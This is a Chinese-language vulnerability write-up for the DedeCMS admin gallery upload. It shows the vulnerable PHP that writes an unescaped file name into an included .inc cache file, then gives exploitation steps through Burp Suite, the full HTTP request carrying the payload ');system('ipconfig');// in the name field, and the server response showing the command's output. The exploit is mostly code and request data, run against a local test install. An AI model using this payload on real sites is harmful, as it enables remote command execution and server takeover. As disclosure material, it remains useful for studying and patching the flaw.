漏洞产生原因: 写入inc文件+文件包含导致任意代码执行
漏洞代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
| <?php
... if ($albumUploadFiles !== '') { $files = json_decode(stripslashes($albumUploadFiles), true); foreach ($files as $file) { $uploadTmp = DEDEDATA . '/uploadtmp'; $tmpFile = $uploadTmp . '/' . $file['name']; $fileDir = $cfg_image_dir . '/' . MyDate($cfg_addon_savetype, time()); CreateDir($fileDir); $filePath = $fileDir . '/' . $file['name']; ... $fid = $dsql->GetLastID(); AddMyAddon($fid, $filePath);
function AddMyAddon($fid, $filename) { $cacheFile = DEDEDATA.'/cache/addon-'.session_id().'.inc'; if(!file_exists($cacheFile)) { $fp = fopen($cacheFile, 'w'); fwrite($fp, '<'.'?php'."\r\n"); fwrite($fp, "\$myaddons = array();\r\n"); fwrite($fp, "\$maNum = 0;\r\n"); fclose($fp); } include($cacheFile); $fp = fopen($cacheFile, 'a'); $arrPos = $maNum; $maNum++; fwrite($fp, "\$myaddons[\$maNum] = array('$fid', '$filename');\r\n"); fwrite($fp, "\$maNum = $maNum;\r\n"); fclose($fp); }
|
利用过程
- 登录管理员后台,然后选择右上角“内容维护”,然后点击左边的“图片集”,最后点击中间的“添加文档”。如下图所示:
- 进入到“添加文档”之后,依次填写“图集标题”,选择“图集主栏目”,在手工上传处选择本地图片上传一张图片。
- 然后打开burpsuit开启监听,拦截住点击“确定”按钮的HTTP请求,然后修改图示位置的name参数的值为
');system('ipconfig');//
,然后将该HTTP请求发送。
- 可以看到成功执行ipconfig命令。
完整HTTP请求
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187
| POST /dede/album_add.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 4121 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://dedecms-57105.localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoNBMhAWA73UNeUq User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=693db57bf5d85c42; PHPSESSID=0kckthapkrjb7jlhg207ovnit2; _csrf_name_8fc2d915=ee428983820312df1afe447e487e3dbd; _csrf_name_8fc2d9151BH21ANI1AGD297L1FF21LN02BGE1DNG=e2a21dd6e71d551c; DedeLoginTime=1694173153; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=1971781375dd7f27; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2 Connection: close
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="channelid"
2 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="cid"
0 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="imagebody"
粘贴到这里... ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="dopost"
save ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="maxwidth"
800 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="albumUploadFiles"
[{"name":"');system('ipconfig');//","remark":"something"}] ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="title"
rce ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="shorttitle"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="redirecturl"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="tags"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="weight"
108 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="picname"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="litpic"; filename="" Content-Type: application/octet-stream
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="typeid"
13 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="typeid2"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="dede_addonfields"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="pagestyle"
2 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="row"
3 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="col"
4 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="ddmaxwidth"
200 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="pagepicnum"
12 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="isrm"
1 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="zipfile"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="delzip"
1 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="copysource"
http:// ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="body"
<p>123123</p> ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="source"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="writer"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="notpost"
0 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="click"
199 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="sortup"
0 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="color"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="arcrank"
0 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="ishtml"
1 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="pubdate"
2023-09-08 19:55:03 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="money"
0 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="keywords"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="description"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="filename"
------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="imageField.x"
44 ------WebKitFormBoundaryfoNBMhAWA73UNeUq Content-Disposition: form-data; name="imageField.y"
17 ------WebKitFormBoundaryfoNBMhAWA73UNeUq--
|
HTTP响应
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126
| HTTP/1.1 200 OK Connection: close Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Fri, 08 Sep 2023 12:02:32 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/5.6.9 Content-Length: 4344
Windows IP ����
δ֪������ Appgate SDP:
�����ض��� DNS �� . . . . . . . : IPv4 ��ַ . . . . . . . . . . . . : 192.168.9.86 �������� . . . . . . . . . . . . : 255.255.255.255 Ĭ������. . . . . . . . . . . . . :
��̫�������� ��̫��:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . : TBMDT.COM
��̫�������� ��̫�� 2:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . :
��̫�������� VirtualBox Host-Only Network:
�����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::3e32:8785:dc70:871f%22 IPv4 ��ַ . . . . . . . . . . . . : 192.168.56.1 �������� . . . . . . . . . . . . : 255.255.255.0 Ĭ������. . . . . . . . . . . . . :
δ֪������ OpenVPN TAP-Windows6:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 1:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . :
���߾����������� ��������* 10:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . :
��̫�������� VMware Network Adapter VMnet1:
�����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::49f3:576f:5115:6188%8 IPv4 ��ַ . . . . . . . . . . . . : 192.168.65.1 �������� . . . . . . . . . . . . : 255.255.255.0 Ĭ������. . . . . . . . . . . . . :
��̫�������� VMware Network Adapter VMnet8:
�����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::3812:ae41:6c56:c806%11 IPv4 ��ַ . . . . . . . . . . . . : 192.168.40.1 �������� . . . . . . . . . . . . : 255.255.255.0 Ĭ������. . . . . . . . . . . . . :
��̫�������� ������������:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ����� �����ض��� DNS �� . . . . . . . : <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>成功发布一个图集!</title> <link rel="stylesheet" type="text/css" href="/plus/img/base.css"> </head> <body background='/plus/img/allbg.gif' leftmargin="8" topmargin='8'> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#DFF9AA"> <tr> <td height="28" style="border:1px solid #DADADA" background='/plus/img/wbg.gif'> <b>◇文章管理::发布图集</b> </td> </tr> <tr> <td width="100%" height="80" style="padding-top:5px" bgcolor='#ffffff'> <table width='100%' border='0' cellpadding='3' cellspacing='1' bgcolor='#DADADA'> <tr bgcolor='#DADADA'> <td colspan='2' background='/plus/img/wbg.gif' height='26'><font color='#666600'><b>成功发布一个图集:</b></font></td> </tr> <tr bgcolor='#FFFFFF'> <td colspan='2' height='100'> <div style="line-height:36px;height:36px"> 请选择你的后续操作: <a href='album_add.php?cid=13'><u>继续发布图片</u></a> <a href='archives_do.php?aid=121&dopost=editArchives'><u>更改图集</u></a> <a href='/a/tuji/2023/0908/121.html' target='_blank'><u>预览文档</u></a> <a href='catalog_do.php?cid=13&dopost=listArchives'><u>已发布图片管理</u></a> <a href='/dede/content_i_list.php?channelid=2'>[<u>记忆的列表页</u>]</a> </div><table width='80%' style='border:1px dashed #cdcdcd;margin-left:20px;margin-bottom:15px' id='tgtable' align='left'><tr><td bgcolor='#EBF5C9'> <strong>正在进行相关内容更新,请完成前不要进行其它操作:</strong> </td></tr> <tr><td> <iframe name='stafrm' frameborder='0' id='stafrm' width='100%' height='200px' src='task_do.php?typeid=13&aid=121&dopost=makeprenext&nextdo='></iframe> </td></tr> </table> </td> </tr> <tr><td bgcolor='#F5F5F5'> </td></tr></table>
</td> </tr> </table> <p align="center">
<br> <br> </p> </body>
</html>
|